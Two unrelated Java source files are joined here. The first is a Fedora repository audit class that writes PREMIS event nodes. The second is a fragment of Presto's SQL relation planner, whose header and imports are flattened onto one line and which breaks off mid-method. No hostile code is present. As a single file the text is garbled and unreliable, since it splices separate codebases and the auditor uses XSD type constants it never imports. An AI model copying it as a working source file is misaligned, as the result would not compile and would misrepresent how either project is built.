import static com.hp.hpl.jena.rdf.model.ModelFactory.createDefaultModel;
import static com.hp.hpl.jena.rdf.model.ResourceFactory.createProperty;
import static com.hp.hpl.jena.rdf.model.ResourceFactory.createResource;
import static com.hp.hpl.jena.rdf.model.ResourceFactory.createTypedLiteral;
import static org.modeshape.jcr.api.JcrConstants.JCR_CONTENT;
import static org.slf4j.LoggerFactory.getLogger;

import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Iterator;
import java.util.Set;
import java.util.TimeZone;

import javax.annotation.PostConstruct;
import javax.annotation.PreDestroy;
import javax.inject.Inject;
import javax.jcr.RepositoryException;

import org.fcrepo.kernel.impl.rdf.impl.PrefixingIdentifierTranslator;
import org.fcrepo.kernel.exception.RepositoryRuntimeException;
import org.fcrepo.kernel.identifiers.PidMinter;
import org.fcrepo.kernel.models.FedoraResource;
import org.fcrepo.kernel.observer.FedoraEvent;
import org.fcrepo.kernel.services.ContainerService;
import org.fcrepo.kernel.utils.iterators.RdfStream;
import org.fcrepo.mint.UUIDPathMinter;
import org.modeshape.jcr.api.JcrTools;
import org.modeshape.jcr.api.Repository;
import org.modeshape.jcr.api.Session;
import org.slf4j.Logger;

import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.hp.hpl.jena.rdf.model.Model;
import com.hp.hpl.jena.rdf.model.RDFNode;
import com.hp.hpl.jena.rdf.model.Resource;
import com.hp.hpl.jena.rdf.model.ResourceFactory;
import com.hp.hpl.jena.rdf.model.Statement;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Joiner;
import com.google.common.eventbus.EventBus;
import com.google.common.eventbus.Subscribe;

/**
 * Auditor implementation that creates audit nodes in the repository.
 * @author mohideen
 * @author escowles
 * @since 2015-04-15
 */
public class InternalAuditor implements Auditor {

    /**
     * Logger for this class.
     */
    private static final Logger LOGGER = getLogger(InternalAuditor.class);

    // System property naming the repository path under which audit nodes are created.
    private static final String AUDIT_CONTAINER = "fcrepo.audit.container";

    // Normalized container path (leading "/", no trailing "/"); null if the
    // system property was not set, in which case this auditor stays inactive.
    private static String AUDIT_CONTAINER_LOCATION;

    @Inject
    private EventBus eventBus;

    @Inject
    private Repository repository;

    @Inject
    private ContainerService containerService;

    private Session session;

    private static JcrTools jcrTools = new JcrTools(true);

    private static final PidMinter pidMinter = new UUIDPathMinter();

    /**
     * Register with the EventBus to receive events.
     *
     * Reads the audit-container location from the {@value #AUDIT_CONTAINER}
     * system property, normalizes it, ensures the container exists, and
     * registers the audit CND node types.  If the property is absent the
     * auditor logs a warning and does nothing.
     *
     * @throws RepositoryRuntimeException wrapping any {@link RepositoryException}
     */
    @PostConstruct
    public void register() throws RepositoryRuntimeException {
        try {
            AUDIT_CONTAINER_LOCATION = System.getProperty(AUDIT_CONTAINER);
            if (AUDIT_CONTAINER_LOCATION != null) {
                LOGGER.info("Initializing: {}", this.getClass().getCanonicalName());
                eventBus.register(this);
                if (!AUDIT_CONTAINER_LOCATION.startsWith("/")) {
                    AUDIT_CONTAINER_LOCATION = "/" + AUDIT_CONTAINER_LOCATION;
                }
                if (AUDIT_CONTAINER_LOCATION.endsWith("/")) {
                    // BUGFIX: strip exactly the one trailing slash.  The previous
                    // code used length() - 2, which also dropped the last real
                    // character of the path (e.g. "/audit/" became "/audi").
                    AUDIT_CONTAINER_LOCATION = AUDIT_CONTAINER_LOCATION.substring(0,
                            AUDIT_CONTAINER_LOCATION.length() - 1);
                }
                session = repository.login();
                containerService.findOrCreate(session, AUDIT_CONTAINER_LOCATION);
                LOGGER.debug("Registering audit CND");
                jcrTools.registerNodeTypes(session, "audit.cnd");
                session.save();
            } else {
                LOGGER.warn("Cannot Initialize: {}", this.getClass().getCanonicalName());
                LOGGER.warn("System property not found: " + AUDIT_CONTAINER);
            }
        } catch (RepositoryException e) {
            throw new RepositoryRuntimeException(e);
        }
    }

    /**
     * Fedora internal events are received and processed by this method.
     *
     * Events inside the audit container itself are ignored, as are
     * property-change events that only touch lastModified/lastModifiedBy
     * (adding/removing a file updates the parent container's lastModified,
     * and recording those would duplicate the child's own event).
     *
     * @param event
     *        The {@link FedoraEvent} to record.
     * @throws RepositoryRuntimeException
     */
    @Subscribe
    public void recordEvent(final FedoraEvent event) throws RepositoryRuntimeException, IOException {
        LOGGER.debug("Event detected: {} {}", event.getUserID(), event.getPath());
        boolean isParentNodeLastModifiedEvent = false;
        final String eventType = AuditUtils.getEventURIs(event.getTypes());
        final Set<String> properties = event.getProperties();
        if (eventType.contains(AuditProperties.PROPERTY_CHANGED)) {
            isParentNodeLastModifiedEvent = true;
            final Iterator<String> propertiesIter = properties.iterator();
            // BUGFIX: loop on the single iterator instance.  The previous
            // condition was properties.iterator().hasNext(), which builds a
            // fresh iterator each pass and is true whenever the set is
            // non-empty, so propertiesIter.next() threw NoSuchElementException
            // once the real iterator was exhausted.
            while (propertiesIter.hasNext()) {
                final String property = propertiesIter.next();
                if (!property.equals(AuditProperties.LAST_MODIFIED)
                        && !property.equals(AuditProperties.LAST_MODIFIED_BY)) {
                    /* adding/removing a file updates the lastModified property of the parent container,
                       so ignore updates when only lastModified is changed */
                    isParentNodeLastModifiedEvent = false;
                    break;
                }
            }
        }
        if (!event.getPath().startsWith(AUDIT_CONTAINER_LOCATION)
                && !isParentNodeLastModifiedEvent) {
            createAuditNode(event);
        }
    }

    /**
     * Close external connections
     */
    @PreDestroy
    public void releaseConnections() {
        LOGGER.debug("Tearing down: {}", this.getClass().getCanonicalName());
        eventBus.unregister(this);
    }

    // JCR property name, not URI
    private static final String PREMIS_OBJ = "premis:hasEventRelatedObject";

    /**
     * Creates a node for the audit event under the configured container.
     *
     * Extracts user agent and base URL from the event's JSON user data,
     * mints a new PID for the audit record, populates it with PREMIS/PROV
     * triples (event time, agents, type), and links it to the impacted
     * resource via a URI property so the link survives deletion of the
     * target.
     *
     * @param event the event to persist as an audit node
     * @throws RepositoryRuntimeException wrapping any {@link RepositoryException}
     * @throws IOException if the event's user data cannot be parsed as JSON
     */
    public void createAuditNode(final FedoraEvent event) throws RepositoryRuntimeException, IOException {
        try {
            final String uuid = pidMinter.mintPid();
            final String userData = event.getUserData();
            final ObjectMapper mapper = new ObjectMapper();
            final JsonNode json = mapper.readTree(userData);
            final String userAgent = json.get("userAgent").asText();
            String baseURL = json.get("baseURL").asText();
            if (baseURL.endsWith("/")) {
                baseURL = baseURL.substring(0, baseURL.length() - 1);
            }
            String path = event.getPath();
            // Binary events report the jcr:content child; map them to the resource itself.
            if ( path.endsWith("/" + JCR_CONTENT) ) {
                path = path.replaceAll("/" + JCR_CONTENT,"");
            }
            final String uri = baseURL + path;
            final Long timestamp = event.getDate();
            final DateFormat df = new SimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss'Z'");
            df.setTimeZone(TimeZone.getTimeZone("UTC"));
            final String eventDate = df.format(new Date(timestamp));
            final String userID = event.getUserID();
            final String eventType = AuditUtils.getEventURIs(event.getTypes());
            final String properties = Joiner.on(',').join(event.getProperties());
            final String auditEventType = AuditUtils.getAuditEventType(eventType, properties);
            final FedoraResource auditResource = containerService.findOrCreate(session,
                    AUDIT_CONTAINER_LOCATION + "/" + uuid);

            LOGGER.debug("Audit node {} created for event.", uuid);

            final Model m = createDefaultModel();
            final String auditResourceURI = baseURL + AUDIT_CONTAINER_LOCATION + "/" + uuid;
            final Resource s = createResource(auditResourceURI);
            m.add(createStatement(s, AuditProperties.RDF_TYPE,
                    createResource(AuditProperties.INTERNAL_EVENT)));
            m.add(createStatement(s, AuditProperties.RDF_TYPE,
                    createResource(AuditProperties.PREMIS_EVENT)));
            m.add(createStatement(s, AuditProperties.RDF_TYPE,
                    createResource(AuditProperties.PROV_EVENT)));
            m.add(createStatement(s, AuditProperties.PREMIS_TIME,
                    createTypedLiteral(eventDate, XSDdateTime)));
            m.add(createStatement(s, AuditProperties.PREMIS_AGENT,
                    createTypedLiteral(userID, XSDstring)));
            m.add(createStatement(s, AuditProperties.PREMIS_AGENT,
                    createTypedLiteral(userAgent, XSDstring)));
            if (auditEventType != null) {
                m.add(createStatement(s, AuditProperties.PREMIS_TYPE,
                        createResource(auditEventType)));
            }
            auditResource.replaceProperties(
                    new PrefixingIdentifierTranslator(session, baseURL + "/"), m, new RdfStream());

            // set link to impacted object using a URI property to preserve the link if it's deleted
            try {
                auditResource.setURIProperty(PREMIS_OBJ, new URI(uri));
            } catch (URISyntaxException e) {
                LOGGER.warn("Error creating URI for repository resource {}", uri);
            }
            session.save();
        } catch (RepositoryException e) {
            throw new RepositoryRuntimeException(e);
        }
    }

    // Test-visible seam so unit tests can intercept statement creation.
    @VisibleForTesting
    protected Statement createStatement(final Resource subject, final String property, final RDFNode object) {
        return ResourceFactory.createStatement(subject, createProperty(property), object);
    }
}
/* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.facebook.presto.sql.planner; import com.facebook.presto.Session; import com.facebook.presto.SystemSessionProperties; import com.facebook.presto.common.predicate.TupleDomain; import com.facebook.presto.common.type.ArrayType; import com.facebook.presto.common.type.MapType; import com.facebook.presto.common.type.RowType; import com.facebook.presto.common.type.Type; import com.facebook.presto.metadata.Metadata; import com.facebook.presto.spi.ColumnHandle; import com.facebook.presto.spi.TableHandle; import com.facebook.presto.spi.plan.AggregationNode; import com.facebook.presto.spi.plan.Assignments; import com.facebook.presto.spi.plan.ExceptNode; import com.facebook.presto.spi.plan.FilterNode; import com.facebook.presto.spi.plan.IntersectNode; import com.facebook.presto.spi.plan.PlanNode; import com.facebook.presto.spi.plan.PlanNodeIdAllocator; import com.facebook.presto.spi.plan.ProjectNode; import com.facebook.presto.spi.plan.TableScanNode; import com.facebook.presto.spi.plan.UnionNode; import com.facebook.presto.spi.plan.ValuesNode; import com.facebook.presto.spi.relation.RowExpression; import com.facebook.presto.spi.relation.VariableReferenceExpression; import com.facebook.presto.sql.ExpressionUtils; import com.facebook.presto.sql.analyzer.Analysis; import com.facebook.presto.sql.analyzer.Field; import com.facebook.presto.sql.analyzer.RelationId; import com.facebook.presto.sql.analyzer.RelationType; import 
com.facebook.presto.sql.analyzer.Scope; import com.facebook.presto.sql.planner.optimizations.JoinNodeUtils; import com.facebook.presto.sql.planner.optimizations.SampleNodeUtil; import com.facebook.presto.sql.planner.plan.JoinNode; import com.facebook.presto.sql.planner.plan.LateralJoinNode; import com.facebook.presto.sql.planner.plan.SampleNode; import com.facebook.presto.sql.planner.plan.UnnestNode; import com.facebook.presto.sql.tree.AliasedRelation; import com.facebook.presto.sql.tree.Cast; import com.facebook.presto.sql.tree.CoalesceExpression; import com.facebook.presto.sql.tree.ComparisonExpression; import com.facebook.presto.sql.tree.DefaultTraversalVisitor; import com.facebook.presto.sql.tree.Except; import com.facebook.presto.sql.tree.Expression; import com.facebook.presto.sql.tree.ExpressionTreeRewriter; import com.facebook.presto.sql.tree.Identifier; import com.facebook.presto.sql.tree.InPredicate; import com.facebook.presto.sql.tree.Intersect; import com.facebook.presto.sql.tree.IsNotNullPredicate; import com.facebook.presto.sql.tree.Join; import com.facebook.presto.sql.tree.JoinUsing; import com.facebook.presto.sql.tree.LambdaArgumentDeclaration; import com.facebook.presto.sql.tree.Lateral; import com.facebook.presto.sql.tree.NodeRef; import com.facebook.presto.sql.tree.QualifiedName; import com.facebook.presto.sql.tree.Query; import com.facebook.presto.sql.tree.QuerySpecification; import com.facebook.presto.sql.tree.Relation; import com.facebook.presto.sql.tree.Row; import com.facebook.presto.sql.tree.SampledRelation; import com.facebook.presto.sql.tree.SetOperation; import com.facebook.presto.sql.tree.SymbolReference; import com.facebook.presto.sql.tree.Table; import com.facebook.presto.sql.tree.TableSubquery; import com.facebook.presto.sql.tree.Union; import com.facebook.presto.sql.tree.Unnest; import com.facebook.presto.sql.tree.Values; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableListMultimap; import 
com.google.common.collect.ImmutableMap; import com.google.common.collect.Iterables; import com.google.common.collect.ListMultimap; import com.google.common.collect.UnmodifiableIterator; import java.util.ArrayList; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import static com.facebook.presto.spi.plan.AggregationNode.singleGroupingSet; import static com.facebook.presto.spi.plan.ProjectNode.Locality.LOCAL; import static com.facebook.presto.sql.analyzer.ExpressionTreeUtils.isEqualComparisonExpression; import static com.facebook.presto.sql.analyzer.SemanticExceptions.notSupportedException; import static com.facebook.presto.sql.planner.plan.AssignmentUtils.identitiesAsSymbolReferences; import static com.facebook.presto.sql.relational.OriginalExpressionUtils.asSymbolReference; import static com.facebook.presto.sql.relational.OriginalExpressionUtils.castToRowExpression; import static com.facebook.presto.sql.tree.Join.Type.INNER; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.base.Preconditions.checkState; import static com.google.common.base.Verify.verify; import static com.google.common.collect.ImmutableList.toImmutableList; import static java.util.Objects.requireNonNull; class RelationPlanner extends DefaultTraversalVisitor<RelationPlan, Void> { private final Analysis analysis; private final PlanVariableAllocator variableAllocator; private final PlanNodeIdAllocator idAllocator; private final Map<NodeRef<LambdaArgumentDeclaration>, VariableReferenceExpression> lambdaDeclarationToVariableMap; private final Metadata metadata; private final Session session; private final SubqueryPlanner subqueryPlanner; RelationPlanner( Analysis analysis, PlanVariableAllocator variableAllocator, PlanNodeIdAllocator idAllocator, Map<NodeRef<LambdaArgumentDeclaration>, VariableReferenceExpression> 
lambdaDeclarationToVariableMap, Metadata metadata, Session session)
{
    // NOTE(review): this excerpt is the interior of a relation-planning visitor;
    // the class header, fields, and the start of this constructor are declared
    // above this chunk. Constructor: validate all collaborators, then store them.
    requireNonNull(analysis, "analysis is null");
    requireNonNull(variableAllocator, "variableAllocator is null");
    requireNonNull(idAllocator, "idAllocator is null");
    requireNonNull(lambdaDeclarationToVariableMap, "lambdaDeclarationToVariableMap is null");
    requireNonNull(metadata, "metadata is null");
    requireNonNull(session, "session is null");

    this.analysis = analysis;
    this.variableAllocator = variableAllocator;
    this.idAllocator = idAllocator;
    this.lambdaDeclarationToVariableMap = lambdaDeclarationToVariableMap;
    this.metadata = metadata;
    this.session = session;
    this.subqueryPlanner = new SubqueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session);
}

// Plans a base-table reference (or a named WITH/view query), producing one output
// variable per field of the relation's analyzed scope.
@Override
protected RelationPlan visitTable(Table node, Void context)
{
    Query namedQuery = analysis.getNamedQuery(node);
    Scope scope = analysis.getScope(node);

    if (namedQuery != null) {
        RelationPlan subPlan = process(namedQuery, null);

        // Add implicit coercions if view query produces types that don't match the declared output types
        // of the view (e.g., if the underlying tables referenced by the view changed)
        Type[] types = scope.getRelationType().getAllFields().stream().map(Field::getType).toArray(Type[]::new);
        RelationPlan withCoercions = addCoercions(subPlan, types);
        return new RelationPlan(withCoercions.getRoot(), scope, withCoercions.getFieldMappings());
    }

    TableHandle handle = analysis.getTableHandle(node);

    // Allocate a fresh plan variable per field and remember its backing column.
    ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder();
    ImmutableMap.Builder<VariableReferenceExpression, ColumnHandle> columns = ImmutableMap.builder();
    for (Field field : scope.getRelationType().getAllFields()) {
        VariableReferenceExpression variable = variableAllocator.newVariable(field.getName().get(), field.getType());
        outputVariablesBuilder.add(variable);
        columns.put(variable, analysis.getColumn(field));
    }

    List<VariableReferenceExpression> outputVariables = outputVariablesBuilder.build();
    PlanNode root = new TableScanNode(idAllocator.getNextId(), handle, outputVariables, columns.build(), TupleDomain.all(), TupleDomain.all());
    return new RelationPlan(root, scope, outputVariables);
}

// Plans "relation AS alias (c1, c2, ...)". When column names are given, projects
// only the visible fields under freshly allocated (aliased) variables.
@Override
protected RelationPlan visitAliasedRelation(AliasedRelation node, Void context)
{
    RelationPlan subPlan = process(node.getRelation(), context);

    PlanNode root = subPlan.getRoot();
    List<VariableReferenceExpression> mappings = subPlan.getFieldMappings();

    if (node.getColumnNames() != null) {
        ImmutableList.Builder<VariableReferenceExpression> newMappings = ImmutableList.builder();
        Assignments.Builder assignments = Assignments.builder();

        // project only the visible columns from the underlying relation
        for (int i = 0; i < subPlan.getDescriptor().getAllFieldCount(); i++) {
            Field field = subPlan.getDescriptor().getFieldByIndex(i);
            if (!field.isHidden()) {
                VariableReferenceExpression aliasedColumn = variableAllocator.newVariable(field);
                assignments.put(aliasedColumn, castToRowExpression(asSymbolReference(subPlan.getFieldMappings().get(i))));
                newMappings.add(aliasedColumn);
            }
        }

        root = new ProjectNode(idAllocator.getNextId(), subPlan.getRoot(), assignments.build(), LOCAL);
        mappings = newMappings.build();
    }

    return new RelationPlan(root, analysis.getScope(node), mappings);
}

// Plans "relation TABLESAMPLE type (ratio)" by wrapping the child in a SampleNode.
@Override
protected RelationPlan visitSampledRelation(SampledRelation node, Void context)
{
    RelationPlan subPlan = process(node.getRelation(), context);

    double ratio = analysis.getSampleRatio(node);
    PlanNode planNode = new SampleNode(idAllocator.getNextId(), subPlan.getRoot(), ratio, SampleNodeUtil.fromType(node.getType()));
    return new RelationPlan(planNode, analysis.getScope(node), subPlan.getFieldMappings());
}

// Plans a JOIN. Special-cases UNNEST and LATERAL on the right side, USING criteria,
// and splits ON conjuncts into equi-clauses vs. complex filter expressions.
@Override
protected RelationPlan visitJoin(Join node, Void context)
{
    // TODO: translate the RIGHT join into a mirrored LEFT join when we refactor (@martint)
    RelationPlan leftPlan = process(node.getLeft(), context);

    Optional<Unnest> unnest = getUnnest(node.getRight());
    if (unnest.isPresent()) {
        // UNNEST is only legal on the right side of an (implicit) cross join.
        if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) {
            throw notSupportedException(unnest.get(), "UNNEST on other than the right side of CROSS JOIN");
        }
        return planCrossJoinUnnest(leftPlan, node, unnest.get());
    }

    Optional<Lateral> lateral = getLateral(node.getRight());
    if (lateral.isPresent()) {
        // LATERAL has the same restriction as UNNEST above.
        if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) {
            throw notSupportedException(lateral.get(), "LATERAL on other than the right side of CROSS JOIN");
        }
        return planLateralJoin(node, leftPlan, lateral.get());
    }

    RelationPlan rightPlan = process(node.getRight(), context);

    if (node.getCriteria().isPresent() && node.getCriteria().get() instanceof JoinUsing) {
        return planJoinUsing(node, leftPlan, rightPlan);
    }

    PlanBuilder leftPlanBuilder = initializePlanBuilder(leftPlan);
    PlanBuilder rightPlanBuilder = initializePlanBuilder(rightPlan);

    // NOTE: variables must be in the same order as the outputDescriptor
    List<VariableReferenceExpression> outputs = ImmutableList.<VariableReferenceExpression>builder()
            .addAll(leftPlan.getFieldMappings())
            .addAll(rightPlan.getFieldMappings())
            .build();

    ImmutableList.Builder<JoinNode.EquiJoinClause> equiClauses = ImmutableList.builder();
    List<Expression> complexJoinExpressions = new ArrayList<>();
    List<Expression> postInnerJoinConditions = new ArrayList<>();

    if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) {
        Expression criteria = analysis.getJoinCriteria(node);

        RelationType left = analysis.getOutputDescriptor(node.getLeft());
        RelationType right = analysis.getOutputDescriptor(node.getRight());

        List<Expression> leftComparisonExpressions = new ArrayList<>();
        List<Expression> rightComparisonExpressions = new ArrayList<>();
        List<ComparisonExpression.Operator> joinConditionComparisonOperators = new ArrayList<>();

        // Classify each conjunct of the ON clause: single-sided predicates and
        // non-equality conditions become "complex" expressions; two-sided
        // comparisons become candidate equi-join clauses (flipped if needed so
        // the left operand resolves against the left relation).
        for (Expression conjunct : ExpressionUtils.extractConjuncts(criteria)) {
            conjunct = ExpressionUtils.normalize(conjunct);

            if (!isEqualComparisonExpression(conjunct) && node.getType() != INNER) {
                complexJoinExpressions.add(conjunct);
                continue;
            }

            Set<QualifiedName> dependencies = VariablesExtractor.extractNames(conjunct, analysis.getColumnReferences());

            if (dependencies.stream().allMatch(left::canResolve) || dependencies.stream().allMatch(right::canResolve)) {
                // If the conjunct can be evaluated entirely with the inputs on either side of the join, add
                // it to the list complex expressions and let the optimizers figure out how to push it down later.
                complexJoinExpressions.add(conjunct);
            }
            else if (conjunct instanceof ComparisonExpression) {
                Expression firstExpression = ((ComparisonExpression) conjunct).getLeft();
                Expression secondExpression = ((ComparisonExpression) conjunct).getRight();
                ComparisonExpression.Operator comparisonOperator = ((ComparisonExpression) conjunct).getOperator();
                Set<QualifiedName> firstDependencies = VariablesExtractor.extractNames(firstExpression, analysis.getColumnReferences());
                Set<QualifiedName> secondDependencies = VariablesExtractor.extractNames(secondExpression, analysis.getColumnReferences());

                if (firstDependencies.stream().allMatch(left::canResolve) && secondDependencies.stream().allMatch(right::canResolve)) {
                    leftComparisonExpressions.add(firstExpression);
                    rightComparisonExpressions.add(secondExpression);
                    addNullFilters(complexJoinExpressions, node.getType(), firstExpression, secondExpression);
                    joinConditionComparisonOperators.add(comparisonOperator);
                }
                else if (firstDependencies.stream().allMatch(right::canResolve) && secondDependencies.stream().allMatch(left::canResolve)) {
                    leftComparisonExpressions.add(secondExpression);
                    rightComparisonExpressions.add(firstExpression);
                    addNullFilters(complexJoinExpressions, node.getType(), secondExpression, firstExpression);
                    joinConditionComparisonOperators.add(comparisonOperator.flip());
                }
                else {
                    // the case when we mix variables from both left and right join side on either side of condition.
                    complexJoinExpressions.add(conjunct);
                }
            }
            else {
                complexJoinExpressions.add(conjunct);
            }
        }

        leftPlanBuilder = subqueryPlanner.handleSubqueries(leftPlanBuilder, leftComparisonExpressions, node);
        rightPlanBuilder = subqueryPlanner.handleSubqueries(rightPlanBuilder, rightComparisonExpressions, node);

        // Add projections for join criteria
        leftPlanBuilder = leftPlanBuilder.appendProjections(leftComparisonExpressions, variableAllocator, idAllocator);
        rightPlanBuilder = rightPlanBuilder.appendProjections(rightComparisonExpressions, variableAllocator, idAllocator);

        for (int i = 0; i < leftComparisonExpressions.size(); i++) {
            if (joinConditionComparisonOperators.get(i) == ComparisonExpression.Operator.EQUAL) {
                VariableReferenceExpression leftVariable = leftPlanBuilder.translateToVariable(leftComparisonExpressions.get(i));
                VariableReferenceExpression righVariable = rightPlanBuilder.translateToVariable(rightComparisonExpressions.get(i));
                equiClauses.add(new JoinNode.EquiJoinClause(leftVariable, righVariable));
            }
            else {
                // Non-equality comparisons become a post-join filter (INNER only).
                Expression leftExpression = leftPlanBuilder.rewrite(leftComparisonExpressions.get(i));
                Expression rightExpression = rightPlanBuilder.rewrite(rightComparisonExpressions.get(i));
                postInnerJoinConditions.add(new ComparisonExpression(joinConditionComparisonOperators.get(i), leftExpression, rightExpression));
            }
        }
    }

    PlanNode root = new JoinNode(idAllocator.getNextId(),
            JoinNodeUtils.typeConvert(node.getType()),
            leftPlanBuilder.getRoot(),
            rightPlanBuilder.getRoot(),
            equiClauses.build(),
            ImmutableList.<VariableReferenceExpression>builder()
                    .addAll(leftPlanBuilder.getRoot().getOutputVariables())
                    .addAll(rightPlanBuilder.getRoot().getOutputVariables())
                    .build(),
            Optional.empty(),
            Optional.empty(),
            Optional.empty(),
            Optional.empty());

    if (node.getType() != INNER) {
        for (Expression complexExpression : complexJoinExpressions) {
            Set<InPredicate> inPredicates = subqueryPlanner.collectInPredicateSubqueries(complexExpression, node);
            if (!inPredicates.isEmpty()) {
                InPredicate inPredicate = Iterables.getLast(inPredicates);
                throw notSupportedException(inPredicate, "IN with subquery predicate in join condition");
            }
        }

        // subqueries can be applied only to one side of join - left side is selected in arbitrary way
        leftPlanBuilder = subqueryPlanner.handleUncorrelatedSubqueries(leftPlanBuilder, complexJoinExpressions, node);
    }

    RelationPlan intermediateRootRelationPlan = new RelationPlan(root, analysis.getScope(node), outputs);
    TranslationMap translationMap = new TranslationMap(intermediateRootRelationPlan, analysis, lambdaDeclarationToVariableMap);
    translationMap.setFieldMappings(outputs);
    translationMap.putExpressionMappingsFrom(leftPlanBuilder.getTranslations());
    translationMap.putExpressionMappingsFrom(rightPlanBuilder.getTranslations());

    if (node.getType() != INNER && !complexJoinExpressions.isEmpty()) {
        // For outer joins, complex conditions must live on the join node itself,
        // so rebuild it with the rewritten filter attached.
        Expression joinedFilterCondition = ExpressionUtils.and(complexJoinExpressions);
        Expression rewrittenFilterCondition = translationMap.rewrite(joinedFilterCondition);
        root = new JoinNode(idAllocator.getNextId(),
                JoinNodeUtils.typeConvert(node.getType()),
                leftPlanBuilder.getRoot(),
                rightPlanBuilder.getRoot(),
                equiClauses.build(),
                ImmutableList.<VariableReferenceExpression>builder()
                        .addAll(leftPlanBuilder.getRoot().getOutputVariables())
                        .addAll(rightPlanBuilder.getRoot().getOutputVariables())
                        .build(),
                Optional.of(castToRowExpression(rewrittenFilterCondition)),
                Optional.empty(),
                Optional.empty(),
                Optional.empty());
    }

    if (node.getType() == INNER) {
        // rewrite all the other conditions using output variables from left + right plan node.
        PlanBuilder rootPlanBuilder = new PlanBuilder(translationMap, root, analysis.getParameters());
        rootPlanBuilder = subqueryPlanner.handleSubqueries(rootPlanBuilder, complexJoinExpressions, node);

        for (Expression expression : complexJoinExpressions) {
            postInnerJoinConditions.add(rootPlanBuilder.rewrite(expression));
        }
        root = rootPlanBuilder.getRoot();

        Expression postInnerJoinCriteria;
        if (!postInnerJoinConditions.isEmpty()) {
            postInnerJoinCriteria = ExpressionUtils.and(postInnerJoinConditions);
            root = new FilterNode(idAllocator.getNextId(), root, castToRowExpression(postInnerJoinCriteria));
        }
    }

    return new RelationPlan(root, analysis.getScope(node), outputs);
}

// When the null-in-join optimization is enabled, adds IS NOT NULL filters for the
// join-key expressions on whichever side(s) cannot produce null-extended rows.
private void addNullFilters(List<Expression> conditions, Join.Type joinType, Expression left, Expression right)
{
    if (SystemSessionProperties.isOptimizeNullsInJoin(session)) {
        switch (joinType) {
            case INNER:
                addNullFilterIfSupported(conditions, left);
                addNullFilterIfSupported(conditions, right);
                break;
            case LEFT:
                addNullFilterIfSupported(conditions, right);
                break;
            case RIGHT:
                addNullFilterIfSupported(conditions, left);
                break;
        }
    }
}

// Appends an IS NOT NULL predicate for the expression unless it is an IN predicate.
private void addNullFilterIfSupported(List<Expression> conditions, Expression incoming)
{
    if (!(incoming instanceof InPredicate)) {
        // (A.x IN (1,2,3)) IS NOT NULL is not supported as a join condition as of today.
        conditions.add(new IsNotNullPredicate(incoming));
    }
}

// Plans "l JOIN r USING (k1, ..., kn)": coerce both sides' key columns to the
// common supertype, equi-join on them, then project coalesce(l.k, r.k) for each key.
private RelationPlan planJoinUsing(Join node, RelationPlan left, RelationPlan right)
{
    /*
        Given: l JOIN r USING (k1, ..., kn)

        produces:

            - project
                    coalesce(l.k1, r.k1)
                    ...,
                    coalesce(l.kn, r.kn)
                    l.v1,
                    ...,
                    l.vn,
                    r.v1,
                    ...,
                    r.vn
              - join (l.k1 = r.k1 and ... l.kn = r.kn)
                    - project
                            cast(l.k1 as commonType(l.k1, r.k1))
                            ...
                    - project
                            cast(rl.k1 as commonType(l.k1, r.k1))

        If casts are redundant (due to column type and common type being equal),
        they will be removed by optimization passes.
    */

    List<Identifier> joinColumns = ((JoinUsing) node.getCriteria().get()).getColumns();

    Analysis.JoinUsingAnalysis joinAnalysis = analysis.getJoinUsing(node);

    ImmutableList.Builder<JoinNode.EquiJoinClause> clauses = ImmutableList.builder();

    Map<Identifier, VariableReferenceExpression> leftJoinColumns = new HashMap<>();
    Map<Identifier, VariableReferenceExpression> rightJoinColumns = new HashMap<>();

    Assignments.Builder leftCoercions = Assignments.builder();
    Assignments.Builder rightCoercions = Assignments.builder();

    leftCoercions.putAll(identitiesAsSymbolReferences(left.getRoot().getOutputVariables()));
    rightCoercions.putAll(identitiesAsSymbolReferences(right.getRoot().getOutputVariables()));
    for (int i = 0; i < joinColumns.size(); i++) {
        Identifier identifier = joinColumns.get(i);
        Type type = analysis.getType(identifier);

        // compute the coercion for the field on the left to the common supertype of left & right
        VariableReferenceExpression leftOutput = variableAllocator.newVariable(identifier, type);
        int leftField = joinAnalysis.getLeftJoinFields().get(i);
        leftCoercions.put(leftOutput, castToRowExpression(new Cast(
                new SymbolReference(left.getVariable(leftField).getName()),
                type.getTypeSignature().toString(),
                false,
                metadata.getTypeManager().isTypeOnlyCoercion(left.getDescriptor().getFieldByIndex(leftField).getType(), type))));
        leftJoinColumns.put(identifier, leftOutput);

        // compute the coercion for the field on the right to the common supertype of left & right
        VariableReferenceExpression rightOutput = variableAllocator.newVariable(identifier, type);
        int rightField = joinAnalysis.getRightJoinFields().get(i);
        rightCoercions.put(rightOutput, castToRowExpression(new Cast(
                new SymbolReference(right.getVariable(rightField).getName()),
                type.getTypeSignature().toString(),
                false,
                metadata.getTypeManager().isTypeOnlyCoercion(right.getDescriptor().getFieldByIndex(rightField).getType(), type))));
        rightJoinColumns.put(identifier, rightOutput);

        clauses.add(new JoinNode.EquiJoinClause(leftOutput, rightOutput));
    }

    ProjectNode leftCoercion = new ProjectNode(idAllocator.getNextId(), left.getRoot(), leftCoercions.build());
    ProjectNode rightCoercion = new ProjectNode(idAllocator.getNextId(), right.getRoot(), rightCoercions.build());

    JoinNode join = new JoinNode(
            idAllocator.getNextId(),
            JoinNodeUtils.typeConvert(node.getType()),
            leftCoercion,
            rightCoercion,
            clauses.build(),
            ImmutableList.<VariableReferenceExpression>builder()
